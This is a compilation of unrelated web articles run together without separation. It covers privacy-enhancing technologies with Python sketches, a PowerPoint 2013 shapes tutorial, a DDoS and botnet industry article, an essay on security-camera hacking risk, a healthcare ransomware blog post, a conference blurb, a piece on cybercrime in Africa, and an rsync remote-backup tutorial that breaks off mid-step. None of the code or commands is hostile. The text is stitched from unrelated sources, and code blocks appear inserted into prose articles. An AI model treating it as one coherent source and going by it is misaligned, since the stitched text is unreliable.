Drawbacks: Hardware dependent – i.e., trust is placed in the specific chip, not in the math used to encrypt and decrypt the data; data not encrypted while in the TEE.
What are zero-knowledge proofs: Two different parties can prove to one another that they know something about data without revealing the underlying data itself. (Shafi Goldwasser invented ZKPs along with Silvio Micali and Charles Rackoff in 1985; Goldwasser and Micali went on to win the Turing Award in 2012.)
What are zero-knowledge proofs used for: Providing privacy to public blockchains; online voting; authentication.
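The flavor of a ZKP is easiest to see in the classic Schnorr identification protocol, where a prover convinces a verifier that she knows the discrete logarithm x of a public value y = g^x mod p without revealing x. (A toy sketch with a deliberately tiny prime; real systems use much larger groups and usually non-interactive variants.)

```python
import random

# Tiny public parameters for illustration: p = 2q + 1 is a safe prime and
# g = 4 generates the subgroup of prime order q.
p, q, g = 1019, 509, 4

x = random.randrange(1, q)      # the prover's secret
y = pow(g, x, p)                # public value; she proves knowledge of x

# One round of the interactive protocol:
r = random.randrange(q)         # prover: random nonce
t = pow(g, r, p)                # prover -> verifier: commitment
c = random.randrange(q)         # verifier -> prover: random challenge
s = (r + c * x) % q             # prover -> verifier: response

# The verifier learns nothing about x, yet can check the claim:
assert pow(g, s, p) == t * pow(y, c, p) % p
print("proof accepted")
```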
Data Privacy Tools Sometimes Categorized as Privacy Enhancing Technologies (PET)
Some listings of privacy enhancing technologies include data privacy tools which change the input data to conform to regulations (e.g., HIPAA) regarding Personally Identifiable Information (PII). We list them separately here because of a significant drawback: data devaluation. Changing or deleting data using one of the two techniques below enhances privacy, but also significantly degrades the quality of the data – and ultimately reduces the value of insights that can be drawn from it. By being unable to perform precise calculations on altered data, valuable insights are lost with every computation.
| Tool | Description |
| --- | --- |
| Synthetic Data | Artificially created data which is meant to represent real-world sensitive data. |
| Anonymized (De-identified) Data | Strips data of PII using techniques like deleting or masking personal identifiers with hashing, suppressing, or generalizing quasi-identifiers. |
What is synthetic data: Fully algorithmically generated data produced by a computer simulation that approximates a real data set.
What it is used for: Reducing constraints on using sensitive data in highly regulated industries or for software testing.
Drawbacks: Cannot do precise, accurate computations on individual data points; cannot be linked to real data.
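A minimal illustration of the idea: fit a simple statistical model to the real records, then sample artificial rows from the model. (Production tools use far richer generative models; the "real" records below are fabricated for the demo, and the linear-Gaussian model is an assumption.)

```python
import random
import statistics

# Pretend these are sensitive real records: (age, systolic blood pressure).
real = [(34, 118), (51, 131), (45, 125), (62, 142), (29, 112),
        (58, 139), (41, 122), (70, 151), (38, 120), (55, 135)]

ages, bps = zip(*real)
age_mu, age_sd = statistics.mean(ages), statistics.stdev(ages)
# Crude model: blood pressure as a linear function of age plus Gaussian noise.
slope = statistics.covariance(list(ages), list(bps)) / statistics.variance(ages)
intercept = statistics.mean(bps) - slope * age_mu
resid_sd = statistics.stdev([bp - (intercept + slope * a) for a, bp in real])

random.seed(3)
synthetic = []
for _ in range(5):
    a = random.gauss(age_mu, age_sd)
    synthetic.append((round(a), round(intercept + slope * a +
                                      random.gauss(0, resid_sd))))
print(synthetic)   # statistically similar rows that match no real individual
```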
Anonymized (De-identified) Data
What is anonymized data: Strips data of PII using various techniques to delete or mask personal identifiers.
What it is used for: Computations on sensitive data.
Drawbacks: Cannot do precise, accurate computations on individual data points; inability to link data sets; possible to re-identify PII. For example, Netflix de-identified viewer data before sharing it publicly with participants in its recommendation contest; researchers nevertheless managed to re-identify some customers, resulting in a $1M lawsuit.
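In practice, de-identification combines deleting direct identifiers, masking with keyed hashes, and generalizing quasi-identifiers, as in the sketch below. (The salt handling, truncation and bucket widths are illustrative choices; as the Netflix example shows, such measures reduce but do not eliminate re-identification risk.)

```python
import hashlib
import hmac

SECRET_SALT = b"rotate-and-store-me-securely"   # illustrative placeholder

def pseudonymize(value: str) -> str:
    """Keyed hash: the same person always maps to the same token, but the
    token cannot be reversed without the salt."""
    return hmac.new(SECRET_SALT, value.encode(), hashlib.sha256).hexdigest()[:12]

def generalize_age(age: int) -> str:
    low = age // 10 * 10
    return f"{low}-{low + 9}"

record = {"name": "Jane Doe", "zip": "02139", "age": 34, "diagnosis": "J45"}
deidentified = {
    "patient_token": pseudonymize(record["name"]),
    "zip3": record["zip"][:3] + "**",            # truncate the quasi-identifier
    "age_band": generalize_age(record["age"]),   # generalize another one
    "diagnosis": record["diagnosis"],
}
print(deidentified)
```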
Choose PET Privacy Enhancing Solutions Based on Use Cases
As we have seen, some privacy enhancing technologies are better than others for specific use cases – whether that is statistical analysis or model training and tuning (combining privacy enhancing technologies provides even more benefits). But even in cases where the data itself is being changed, choosing to add extra layers of privacy to your data lifecycle is invaluable to your business: PETs, as a whole, are estimated to be able to unlock between $1.1T and $2.9T of value in underutilized data. So whether you have chosen to deploy one of the PETs listed above or chosen to combine PETs for even more benefits, you are on the path to realizing the value of your data.
Want to learn more? Join us for our webinar on “Maximizing the Value of Your Data.”
Are you tired of creating mediocre PowerPoint presentations? Are you ready to make the most out of this useful program? Step out of your boundaries and use some of these tips to make the most interesting and visually appealing PowerPoint ever!
PowerPoint 2013 has all the tools to get you started in creating an impressive presentation. With its new graphic features and updates to old ones, you will have everything you need to produce a visually stimulating presentation that won’t have your colleagues dosing off to sleep. Here are some tutorials on how to create and format basic shapes, merge shapes, and add some special effects to your presentation.
Create & Format Shapes
Start by opening a blank canvas. This can be done by opening PowerPoint and selecting the Blank Presentation template. To clear the placeholder text boxes that appear, hold the CTRL key while clicking each box, then press Delete. Now you have a blank canvas.
- From the Drawing group on the Home tab, select Shapes, then select the second shape under Rectangles.
- The cursor will become a cross, now simply hold the left mouse button and drag down and over to draw the shape you selected. Once you release the left mouse button the shape will appear.
- To format the shape, place your cursor on the shape and right-click. Now select the Fill icon from the Shortcut menu and choose a gradient from the Theme Colors > Gradient window.
- To make positioning graphics easier, select the View tab and check Rulers and Gridlines so that they appear. Now click your rectangle, press CTRL-C to copy it, and then press CTRL-V seven times to paste seven copies. Position the eight rectangles at the top and bottom of the slide.
- Select a color range for the top row, and a different one for the bottom row from the Shape Styles group in the Format tab. Convert all eight colors to gradients.
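If you ever need to reproduce a layout like this in bulk, the same blank canvas and two rows of rectangles can be generated with the third-party python-pptx library. (An illustrative sketch: it applies solid fills, since gradients are easier to set by hand in PowerPoint, and the colors and positions are arbitrary choices.)

```python
from pptx import Presentation
from pptx.util import Inches
from pptx.enum.shapes import MSO_SHAPE
from pptx.dml.color import RGBColor

prs = Presentation()
slide = prs.slides.add_slide(prs.slide_layouts[6])    # layout 6 = blank

# Two rows of four rounded rectangles, mirroring the manual steps above.
colors = [RGBColor(0x44, 0x72, 0xC4), RGBColor(0xED, 0x7D, 0x31),
          RGBColor(0xA5, 0xA5, 0xA5), RGBColor(0xFF, 0xC0, 0x00)]
for top in (Inches(0.5), Inches(5.5)):
    for col in range(4):
        shape = slide.shapes.add_shape(
            MSO_SHAPE.ROUNDED_RECTANGLE,
            Inches(0.5 + col * 2.3), top, Inches(2), Inches(1.5))
        shape.fill.solid()
        shape.fill.fore_color.rgb = colors[col]
        shape.line.fill.background()                  # remove the outline

prs.save("shapes_demo.pptx")
```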
Merge Shapes: splice & dice
- Copy each rectangle from the first row to the center, and then do the same for the bottom row, overlapping the bottom rectangles with the top ones. Click the first rectangle, and then hold down the CTRL key to select the overlapping rectangle. Now the Format tab is available.
- Click the Format tab and select Merge Shapes under the Insert Shapes group. From the dropdown menu, select Union. Now the highlighted shapes become one shape.
- You can follow the same steps in the dropdown menu to Combine the shapes, Fragment them, Intersect, or Subtract them.
With these cool new features you can create any shape or look you want just by combining, joining, or dividing the basic shape provided.
Add Special Effects
Now that you know how to create basic shapes and format them into new shapes, use these cool 3D features to make your shapes pop right off the page. With the use of lighting, shadows, and reflections, you can start to make things look more realistic and fun!
- From the Home tab, select Shapes from the Drawing group and select any shape. Draw the shape down to cover four grid squares.
- With the shape active, select Shape Fill from the Drawing group under Home. Under Theme Colors, select More Fill Colors. Select any color, and then change the transparency to 35%. Now select Shape Outline to turn off the outline.
- Now learn how to turn a circle into a sphere. Right click the circle you made and select Format Shape from the shortcut menu. Under Shape Options, select Effects. Scroll down to the 3D section and click Top Bevel. Choose Circle and set the height and width to 72pts.
- To add material and lighting effects, while the sphere is still selected choose the Material button from the 3D section of the Format Shape menu. Now select the Warm Matte icon. Now you have a sphere with soft lighting and a matte finish. This looks more realistic and eye-popping!
- Experiment with Format Shape from the shortcut menu to add other effects like shadows and reflections.
There are endless possibilities to be experimented with on PowerPoint 2013, so play around with the settings and produce a spectacular presentation for your business needs. The more visually stimulating your presentation, the better results and reception you will receive.
For more information on how to use PowerPoint 2013 to produce an effective presentation for your business needs, contact our team at ✅ ECW Network & IT Solutions - Managed IT Services In Fort Lauderdale. You can call us at (561) 306-2284 or send us an email at [email protected]. We will help ensure your presentation stands out from the crowd!
The ‘distributed’ nature of DDoS refers to the fact that they emanate from different locations
The word Meris (Latvian for plague) will make any cybersecurity expert sit up. Staying true to its name, Meris has wreaked havoc by targeting thousands of computers worldwide since last year. The scale and sophistication of the distributed denial-of-service (DDoS) attacks launched by the new botnet, drawing power from compromised Internet of Things (IoT) devices, personal computers, routers, and home gadgets, is unprecedented. Meris is not the first and won't be the last. DDoS attacks are here to stay and evolving steadily to pose a major threat to a world heavily reliant on digital communications – a fact reinforced in the Nokia Deepfield Network Intelligence report, DDoS in 2021.
What is DDoS?
As the internet brings billions of devices online, thousands of common vulnerabilities and exposures (CVEs) get discovered and, while waiting to get fixed, become available to be exploited by hackers and cybercriminals. DDoS is another type of IP network traffic – albeit a malicious kind that has been around for over two decades. It has been used to disrupt servers, services, or even entire networks by saturating them with a high volume of traffic, high intensity of packets, and flooding internet systems and devices with a high frequency of malformed requests to confuse or render them inoperable. The ‘distributed’ nature of DDoS refers to the fact that they emanate from different locations, sometimes hard to be tracked back because of IP spoofing – techniques used to hide originating IP addresses.
In recent times, at the core of most DDoS attacks are botnets. A botnet is a collection of compromised sets of individual devices like home computers, routers, IP cameras, digital video recorders (DVRs) and even parking meters. The end devices are commonly called bots or zombies because they have been taken over by hackers. The infected machines are usually triggered into action from a command center, a compromised server or a remote computer used by a hacker or cybercriminal.
DDoS is not a new concept and has been exploiting IP protocol and systems vulnerabilities for years. Some protocols, such as Domain Name System (DNS), have gained additional security features though these have not been deployed extensively or universally. However, many protocols still rely on open principles set by the internet community a long time ago. Some of them never envisaged malicious exploits that could jeopardize the intended operation of router-based networks.
Motivations behind DDoS attacks vary widely. Some are executed by lone individuals or hacktivists. Others have a financial angle, including disrupting competitor business or extortion, whereby the perpetrators install ransomware on the target company’s servers and demand a payout to restore services. DDoS is even used as a cyber weapon by nation-states, targeting critical network infrastructure and systems.
Attacks on the upswing
At a time when the cloud, IoT and 5G are transforming the digital world, networks have become even more important. More so after the advent of COVID-19, which has increased the reliance on the internet manifold. Unfortunately, the pandemic has also led to a growth in DDoS traffic. Apart from the 100 percent increase in "high watermark levels" (daily peaks in DDoS traffic), DDoS has become a terabit-level daily reality for many networks globally, with the imminent potential for even more damaging attacks of over 10-15 Tbps. As more than 10,000 attacks from internet providers worldwide were analysed in the DDoS in 2021 report, a perceptible shift has been noted in the threat patterns, with attacks moving beyond PCs and emerging from outside and inside service provider networks, aiming for internet hosts and servers, customers, users, and network infrastructure globally.
“Over the last year, the vast majority of DDoS has now transitioned essentially to IoT devices, other types of cloud servers and compromised cloud accounts,” says Dr. Craig Labovitz, CTO of Nokia Deepfield.
“The IoT devices mostly come with exploitable bugs in their embedded operating systems or web servers. Others, including hundreds of thousands of devices, ship with a default password,” he adds.
While most DDoS attacks are treated as a nuisance, high-bandwidth and high-packet-intensity volumetric attacks are worrying. With volumetric amplification DDoS, attackers leverage increased bandwidth and connectivity to deploy millions of servers and unsecured and compromised IoT devices to target and saturate interfaces, routers, load balancers, firewalls, and network hosts.
Large-scale DDoS attacks can be fatal for network routers and infrastructure, disrupting connectivity and service availability for communication service providers (CSPs), enterprises and consumers. They can lead to losses ranging from thousands to millions of dollars.
“It’s worth noting that although some big attacks get the headlines, many go unreported because service providers do not want to expose details about their security capabilities or vulnerabilities. Even worse, attacks can go undetected by service providers until reported by users on social media,” says Alex Pavlovic, Director, Product Marketing at Nokia Deepfield.
Spike in botnet DDoS
Botnet DDoS is one type of traffic that has exhibited significant growth since mid-2021. In the second half of the year, in marked contrast to the pre-IoT era, most of the largest DDoS attacks exclusively leveraged large-scale botnets. Today, botnet DDoS is the source of tens of thousands of attacks daily, with each of them involving anywhere between several thousand and several million IP addresses. It is estimated that between 100,000 and 200,000 active bots are engaged in these attacks.
Nokia Deepfield estimates IoT botnet and amplifier attack capacity to be over 10 Tbps, a significant two to three times increase from the size of any publicly reported DDoS attacks to date. In 2021, aggregate daily DDoS traffic volumes peaked at over 3 Tb/s, with further growth recorded in 2022.
What makes the situation worse is the difficulty of detection and mitigation. In the past, the basic tool to counter DDoS was the offline "traffic cleansing system", or scrubber, which identified and removed malicious traffic and returned genuine traffic to the network. These countermeasures were successful in thwarting common amplification/reflection and synthetic traffic, which normally does not exist as such on the internet. But this approach only worked well while traffic volumes were manageable. The sheer scale of traffic growth puts its cost-effectiveness in question, along with the additional delay and backhaul costs it introduces.
Botnet DDoS, unlike predecessors, uses valid IP addresses, full TCP-IP stacks, legitimate OS-generated protocol headers, correct checksums, and payloads carefully crafted to match normal application traffic. The problem with the older detection algorithms used by legacy scrubber-based solutions is that they require meaningful features for extraction. Features most of today’s large-scale botnet DDoS attacks don’t carry.
“What changes with botnets is that the packets are often encrypted; they often use Transport Layer Security (TLS). And again, because they’re botnets and not just a few servers, you’ve gone from two or three servers launching a DDoS to now 10,000 or 100,000 bots, all of which have independent CPU memory capacity, often running full Linux stacks,” says Labovitz.
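One way to see why the old feature-based detectors struggle is to look at source-address diversity. A classic amplification flood arrives from a handful of reflectors and stands out statistically; botnet traffic arrives from enormous numbers of real addresses and resembles a flash crowd. (A toy illustration, not a Deepfield algorithm; the address patterns are invented.)

```python
import math
import random
from collections import Counter

def source_entropy(sources: list[str]) -> float:
    """Shannon entropy (bits) of the source-IP mix seen in one window."""
    counts = Counter(sources)
    total = len(sources)
    return -sum(c / total * math.log2(c / total) for c in counts.values())

random.seed(42)
n = 50_000
reflectors = [f"198.51.100.{i}" for i in range(5)]
amplification = [random.choice(reflectors) for _ in range(n)]
botnet = [f"10.{random.randrange(256)}.{random.randrange(256)}."
          f"{random.randrange(256)}" for _ in range(n)]

print(f"amplification flood: {source_entropy(amplification):4.1f} bits")
print(f"botnet flood:        {source_entropy(botnet):4.1f} bits")
# The low-entropy amplification flood is easy to flag; the botnet flood
# looks like a flash crowd on this feature alone.
```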
Addressing the new challenge
The big question facing network operators currently is how to prepare for this formidable threat, given the exponential rise in botnets and their ability to generate realistic application payloads. The current approaches to DDoS protection are hobbled by multiple factors, including protection provided only to a few customers or systems, inability to scale, performance degradation, and prohibitive cost.
According to Labovitz, three things need to happen to address the threat.
First, a better job must be done of educating IoT manufacturers, along with implementing industry-wide best common practices. Secondly, security should not be an add-on to the network. "We're approaching the point where we can no longer add security as an afterthought. It must be foundational to the infrastructure," he says. Finally, security experts must change the way they approach detection and mitigation: nowadays, DDoS isn't coming from specific countries or servers; it's coming from botnets and from everywhere, including one's own network.
To safeguard from the new generation of threats, a new and robust DDoS defence must:
- Protect everything and everyone
- Provide real-time detection with better accuracy
- Deliver cost-effective, agile, terabit-level mitigation
- Automate mitigation of complex security policies to drive real-time surgical removal of DDoS threats and attacks
The system needs to provide cloud-era visibility beyond IP addresses and include visibility into the larger internet context, including services, CDNs, websites and IoT devices. At the same time, it must be flexible and capable of detecting new and emerging threats as they develop and evolve.
Hybrid network architectures that combine physical and virtualized network domains are proliferating and creating even more distributed sets of network boundaries that need to be monitored for both ingress and egress DDoS. With the increased number of endpoints that need to be protected – customers, end devices and systems, plus network infrastructure – DDoS security must deliver improved performance with scalability and automation.
Advanced, big data IP network analytics and programmable routers can efficiently block most of the DDoS attacks on the internet. More scalable and cost-effective mitigation can be achieved using the concept of a self-defending network. This means embedding security in the IP network and combining advanced detection capabilities with sophisticated features of the latest generations of router silicon, which allow security enforcement at line speed.
“As the DDoS threat evolves and better tools emerge to combat the menace, the internet community needs to take a firmer stance. The battle against DDoS must be fought with technology and with more involvement and better cooperation from service providers, hyperscale cloud builders, end users, regulators, and governments,” says Pavlovic.
The question of how hackable security cameras really are is key in today's security world. As part of the IoT world, security cameras of today are playing important roles not only in the security area, but also in providing intelligence to accelerate operational efficiency and decision-making in many other business areas. As they become smarter and more complex, their cybersecurity risks also grow. In recent years, the world experienced several examples of cybersecurity incidents with cameras, with the "Mirai Botnet" as one of the most well-known examples. Mirai malware took advantage of insecure IoT devices in a simple but clever way. It scanned the internet for open Telnet ports, then attempted to log in with default passwords. In this way, it was able to amass a botnet army, using the computer power of millions of cameras with default passwords worldwide.
The Mirai botnet attacks took place in 2016 and, luckily, the cybersecurity of IoT devices has improved significantly since then. But some things are still the same and/or cannot be changed. Mikko Hypponen, a Finnish cyber evangelist, is well known for his statement: "If a device is smart, it's vulnerable!". He shows with this statement that all devices that consist of hard- and software and are connected to the internet are insecure (and therefore 'hackable'). Although he made this statement some years ago, it is still true and very relevant – an example of something that hasn't changed.
Security cameras are IoT devices and, therefore, are vulnerable. They are also abundant on the market in a number of forms and are being designed, developed and built by several producers from different countries. Current cameras are so technologically advanced that they come with lots of complex processes and computer power onboard.
These technological developments provide incredible innovative security capabilities, but also serious digital risks. The cameras consist of advanced hard- and software components that are produced both in-house and by third parties. Because of this complexity, such a camera can be seen as a kind of ecosystem on its own and it’s extremely challenging to protect it holistically against the things that could possibly go wrong in this ecosystem. A camera becomes an interesting and inviting attack surface for the ‘bad guys’.
Luckily, cybersecurity has also evolved in recent years and there are different kinds of digital security measures for cameras that can be applied by the camera manufacturers. But, this firstly requires the willingness of the camera manufacturer to put effort and budget into the security of the camera itself. This becomes a key question in this discussion.
As stated before, all security cameras are vulnerable. However, it’s also true that the more difficult it is to hack a camera, the more likely it is that a cyberattacker will jump to another camera that’s easier to hack. Cyberattackers are very smart and sophisticated, but also very pragmatic. They prefer easy targets (if they achieve a similar result). A camera manufacturer that invests in building a cybersecurity foundation that ensures more cyber-resilient cameras, will become a less favourable target for those cyberattackers, because they prefer to focus on cameras that generate the same results with less effort (in other words ‘easier to hack’).
All camera manufacturers and customers need to be fully aware that the more cyber-resilient their cameras are, the less interesting they are for unauthorised hackers to gain access. This cyber resilience requires serious cybersecurity investments in a solid foundation and one of the most effective investments is the implementation of Secure-by-Design into the production process. This means that cybersecurity is built-in during each phase of the production process and not seen as an after-thought when the camera is produced and implemented at the customer’s location. A good example of a Secure-by-Design production process within the IoT industry is the Hikvision Secure Development Life Cycle (HSDLC) as described in the Hikvision Cybersecurity Whitepaper.
Besides the Secure-by-Design implementation, there are other cybersecurity investments that show the commitment of an organisation towards the fundamental cyber resilience of its IoT portfolio. A Security Response Centre is another example. This centre comprises a dedicated team of cybersecurity professionals that responds to and handles customer-submitted security incidents and security matters.
So, a security camera is an IoT device and vulnerable for hackers that are looking for unauthorised access. But, it doesn’t have to be that way, because camera manufacturers can improve the cybersecurity of their IoT devices significantly as long as they take this task very seriously and are willing to invest in the fundamental building blocks of its cybersecurity. Secure-by-Design and a Security Response Centre are just two examples of these investments. The question to consider is whether a company is aware of this and is willing to invest in cybersecurity. Because at the end of this story, it’s not necessarily cameras from one area or lower-priced cameras that will be breached, but cameras from those that don’t take product cybersecurity seriously.
As if the healthcare industry wasn't dealing with enough stress and disruption right now, it's also getting hammered with cyberattacks like spear phishing and ransomware. Some criminal groups have promised to avoid targeting healthcare organizations during the COVID-19 crisis, but most are still willing to attack.
Increasing numbers of healthcare providers in the United States and Europe have fallen victim to cyberattacks, and many of them have been linked to Maze ransomware. This ransomware will not only encrypt data, but it will exfiltrate that data to use in a “backup” extortion attempt. If the victim refuses to pay the ransom, the group behind the attack threatens to publish the private data.
The healthcare industry has been a favorite target for years because criminals have multiple ways to monetize the attack:
- Disruption of IT services can slow operations to a fatal pace. Criminals are betting that a ransom will be paid, especially during emergencies when normal operations require greater urgency.
- Exposure of protected (or personal) health information (PHI) and electronic health records (EHR) can be devastating to organizations and individuals. Criminals who exfiltrate data from the organization can then threaten to publish it if a ransom is not paid.
- PHI and EHR are valuable to other criminals and can be sold for a higher price than a credit card or social security number. Criminals can also keep these records for their own identity-theft schemes.
- The worldwide response to the novel coronavirus, COVID-19, has criminals trying harder to get into networks. Any information on a possible cure or vaccine would be of great interest to private buyers and other governments. Research labs, testing facilities, hospitals, and the World Health Organization are just some of the targets we've seen so far.
Types of attacks against healthcare organizations
Spear phishing: This attack works well and is often the first attempt to get into a company's system. This is not a new type of attack, but the pandemic has provided a lucrative new way to bait victims. People are anxious to get information about the pandemic and the economy, so they are more likely to open and act on an email message related to COVID-19. Healthcare organizations may also be targeted with messages about protective equipment, testing kits, and other supplies.
Ransomware: This is an attack that many cybercriminals love. This malware encrypts data in a way that blocks users from being able to use their files, databases, and other computer systems until they pay a ransom. This is an old attack, but it continues to evolve and present new challenges for healthcare organizations. Cybersecurity Ventures predicts that ransomware will attack a business every 11 seconds by the end of 2021.
Malware: Not all malware is ransomware. Bots, spyware, rootkits, and viruses are all examples of malware that doesn't make any demands for ransom. These attacks still cause damage, cost their victims money, and can eventually lead to other attacks including ransomware. Healthcare organizations and other companies that fall victim to malware infections can experience system problems, data loss, and slower network response due to bots or other malicious traffic.
What you can do
- Maintain strong network security with advanced features like intelligent perimeter protection, user identity awareness, and application control.
- Deploy multiple layers of email protection to defend your organization against spear phishing and malware attacks. Include email backup and archiving for data protection, and configure data leak protection to stop critical data from leaving your business via email.
- Provide a regular cadence of security awareness training for your users.
- Evaluate your backup strategy and confirm that it meets your current needs and is capturing all of the data being generated by the new remote workforce.
- Consider providing a cloud-based web security solution that will protect users from malicious websites and file downloads.
- Enforce best practices when it comes to patch management, password complexity, encryption, and endpoint protection.
Healthcare may always be a target, but your healthcare organization doesn't have to be a victim. With the proper systems and processes in place, you can keep your company protected from cyberattacks.
Christine Barry is Senior Chief Blogger and Social Media Manager at Barracuda. Prior to joining Barracuda, Christine was a field engineer and project manager for K12 and SMB clients for over 15 years. She holds several technology and project management credentials, a Bachelor of Arts, and a Master of Business Administration. She is a graduate of the University of Michigan.
The terrorist threat to our nation’s physical and economic security is always with us. Preparing, preventing and responding to attacks is more critical than ever before given the increasing sophistication and creativity of those who wish to do us harm. Agencies and individuals at all levels of government as well as the private sector must remain knowledgeable, vigilant and prepared. These sessions will increase your awareness and understanding of these threats, and how to protect our nation.
Law Enforcement remains the first line of defense against threats to the homeland and the communities they serve. It is imperative that these first responders have the strategic and tactical knowledge to meet the challenge of the familiar and the unexpected. From the front line to the highest levels of command, these sessions will enable attendees to fine-tune their leadership skills and learn valuable lessons that can be implemented quickly and effectively.
Cybercrime and cyber terrorism are a growing national security threat. Whether from foreign governments, organized crime or terrorist organizations, cyber-attacks are increasing in intensity. No single process will stop these attacks; new approaches and increased vigilance are required. These sessions will provide an understanding of the nature and source of these attacks and how to protect against them.
From physical attacks to cyber threats against control systems, the threat to our nation's critical infrastructure continues to rise. Government and the private sector must implement strategies and technologies that protect critical sectors of our economy in an advanced persistent threat environment. These sessions examine the increased exposure to attacks upon our critical infrastructure and how to best protect and secure these key resources.
The need for flexible, scalable and effective access control system that protects people, assets and facilities is of prime importance to security professionals. Physical access control, perimeter security and video surveillance are all components of an effective system. These sessions address the materials, equipment, systems and procedures and how to integrate them into a comprehensive physical security infrastructure.
Tragic incidents at schools and universities have elevated the need for school administrators, emergency managers, and security personnel to create and maintain a safer campus environment. Security experts and leaders from public and private institutions at all levels will educate attendees with strategies, best practices and case studies for effectively preparing, preventing and responding to threats to students, facility, administration and staff.
Published Thursday, Nov 05 2020 by Karim Husami
With the ongoing pandemic and the rapid shift to digital, many countries around the world are facing increased cybersecurity threats. However, the problem becomes much bigger when there are no sufficient laws in place to safeguard internet users. As such, countries in Africa are currently experiencing a wave of cybercrime.
Africa is one of the fastest-developing continents globally, with over a billion Africans estimated to have internet access by the end of 2022, according to the British consulting firm Ovum.
The danger of high internet penetration is that malicious online activities will soar in the region. "Cybercrime is shifting towards the emerging economies. This is where the cyber criminals believe the low-hanging fruit is," noted Bulent Teksoz of Symantec Middle East.
Cybercrimes cost African economies $3.5 billion in 2017, according to Kenya-based IT and business advisory firm Serianu, with annual losses reaching $649 million for Nigeria, and $210 million in Kenya. In addition, South Africa loses $157 million annually due to cyberattacks, according to the South African Banking Risk Information Centre (SABRIC).
Although cybercrime affects many countries across Africa, including Kenya, Nigeria, Ghana, and Uganda, the issue may not be considered a priority amid pressing socio-economic challenges. However, the high digitization of activities requires more governments to protect the growing number of users making online transactions. According to reports, 86% of South Africans frequently use online banking services, a higher share than in many countries in the Middle East and Turkey.
The problem intensifies as internet penetration increases. Many African internet users lack the skills to protect themselves from rising cyberthreats, and countries need a regulatory framework and a national system for better cybersecurity protection. According to Robert Kayihura, of counsel at Covington & Burling in South Africa, "Only nine African countries have data protection legislation and another 22 have draft regulations pending."
Some enterprises in Africa are adopting solutions like Atlas VPN, a virtual private network service that allows fast connection speeds safely and securely. Solutions of this kind improve cybersecurity by making it harder for hackers to infiltrate or disrupt a network.
We cannot emphasize enough the importance of having a backup. Natural disasters, cyberattacks, or other devastating events can happen when you least expect them. To be on the safe side, it is always recommended to have round-the-clock system backups to ensure business continuity in case of service interruption.
One of the more useful backup utilities for Linux systems is the rsync utility. Rsync, short for remote sync, is a data transfer and synchronization tool that intelligently transfers and synchronizes files between directories or across networked computer systems. It achieves this by comparing file sizes and modification times. If the file size and modification times are different, then it transfers the files from the directory or system that hosts the files to another directory or remote system.
Rsync is configured to securely transfer and synchronize data over the SSH protocol. The file synchronization happens immediately, and with the proper backup testing process in place, you can rest assured that you have a safe, accurate backup.
In an earlier tutorial, we covered how to make local backups using rsync. In this guide, we will go a step further and demonstrate how to make a remote backup — i.e., your data is stored in a separate machine — using the rsync utility.
As you get started, ensure you have the following:
- SSH is installed and running on both the local and destination servers. Chances are SSH daemon is already installed and no further action is required.
To check the version of SSH you are running, run the following command:
$ ssh -V
- In addition, you need two Linux servers — the source or local server and the remote server. Here is the lab setup we will use to demonstrate how rsync works:
Local Server IP: 220.127.116.11 (Ubuntu 20.04)
Remote Server IP: 18.104.22.168 (CentOS 8)
- Lastly, ensure you have a local user configured with sudo privileges.
Step 1: Install Rsync on the Local Server
To start off, ensure that rsync is installed. In this example, we will install rsync on the local server (Ubuntu 20.04) as follows:
$ sudo apt install rsync
Once installed, start and enable the rsync service.
$ sudo systemctl start rsync
$ sudo systemctl enable rsync
To confirm that rsync is installed, run the command:
$ rsync --version
The output below confirms that we have rsync installed:
Step 2: Install and Configure Rsync on the Destination Server
In addition to installing rsync on the source or local server, we also need to install it on the destination server or cloud server. To install rsync on CentOS 8, use the DNF package manager as follows:
$ sudo dnf install rsync rsync-daemon
Once installed, confirm it is installed with the following:
$ rpm -qi rsync
Next, you need to configure rsync to allow remote connections from the source or local server. To do so, create a configuration file as follows:
$ sudo vim /etc/rsyncd.conf
Then paste the following lines into the configuration file. The path directive specifies the path to the destination backup directory, while the hosts allow directive indicates the IP address of the source server.
# add to the end
pid file = /var/run/rsyncd.pid
log file = /var/log/rsyncd.log
max connections = 4
# log transfer results or not
transfer logging = yes
# any name you like
[backup]
# target directory to copy
path = /home/user/backup
# hosts you allow to access
hosts allow = 220.127.116.11
hosts deny = *
list = true
uid = root
gid = root
read only = false
Save and exit.
Then start and enable the rsync service.
$ sudo systemctl start rsyncd
$ sudo systemctl enable rsyncd
And confirm the rsync daemon is running.
$ sudo systemctl status rsyncd
If SELinux is enabled, configure the Boolean setting as follows:
$ setsebool -P rsync_full_access on
Next, configure the firewall to allow rsync service:
$ sudo firewall-cmd --add-service=rsyncd --permanent
$ sudo firewall-cmd --reload
Now let’s put our setup to test and see if we can successfully back up data from the source server to the remote server.
Step 3: Test the Configuration
To test the file backup process, log back into the source server. We already have a directory in our home folder containing a few files that need to be backed up.
To save and sync files remotely, rsync takes the following syntax:
$ sudo rsync -avz -e ssh SOURCE_DIRECTORY USER@DESTINATION_IP:DESTINATION_DIRECTORY
SOURCE_DIRECTORY is the directory to be backed up.
DESTINATION_IP is the IP address of the remote or destination server.
In our example, the full command will be:
$ sudo rsync -avz -e ssh /home/jumpcloud/data/ user@18.104.22.168:/home/user/backup
The directory to be backed up on the local or source server is the /home/jumpcloud/data/ folder, and the destination backup directory is the /home/user/backup folder on the remote server. You can create your own source and destination directories in different paths as you deem fit.
From the output of running the command, the files were transferred successfully to the remote server. This is proof that the file transfer worked.
Step 4: Automate the Backup Process
By default, rsync does not have a built-in automation process for backing up and syncing files without user intervention. Fortunately, we can automate the backup process by creating a shell script with the backup command and automating the script to run at specific times using a cron job.
But first, we need to configure passwordless SSH authentication between the local and remote server since rsync uses SSH to initiate a connection between the two and securely transfer files.
Therefore, generate an SSH keypair as follows:
$ ssh-keygen
This generates both a public and a private key, which are cryptographic keys that are saved in the ~/.ssh directory.
Now, we need to copy the public key to the remote server to enable passwordless SSH authentication. To do so, we will use the ssh-copy-id command as follows:
$ ssh-copy-id user@18.104.22.168
When prompted, authenticate with the remote user's password. The public key is saved in the authorized_keys file in the .ssh directory of the remote server's home folder.
To verify that passwordless authentication works, we will try to log in to the remote server normally as shown.
$ ssh user@18.104.22.168
Now, we are going to create a shell script that will contain the backup command.
$ sudo vim backup.sh
The first line starts with a shebang header — a signature of all shell scripts — followed by the backup command.
#!/bin/bash
rsync -avz -e ssh /home/jumpcloud/data/ user@18.104.22.168:/home/user/backup
Save the script and exit. Next, make the shell script executable:
$ chmod +x backup.sh
The last step is to automate the running of the script using a cron job. To create a cron job, issue the command:
$ crontab -e
This opens the crontab file. At the very bottom of the file, add the following line:
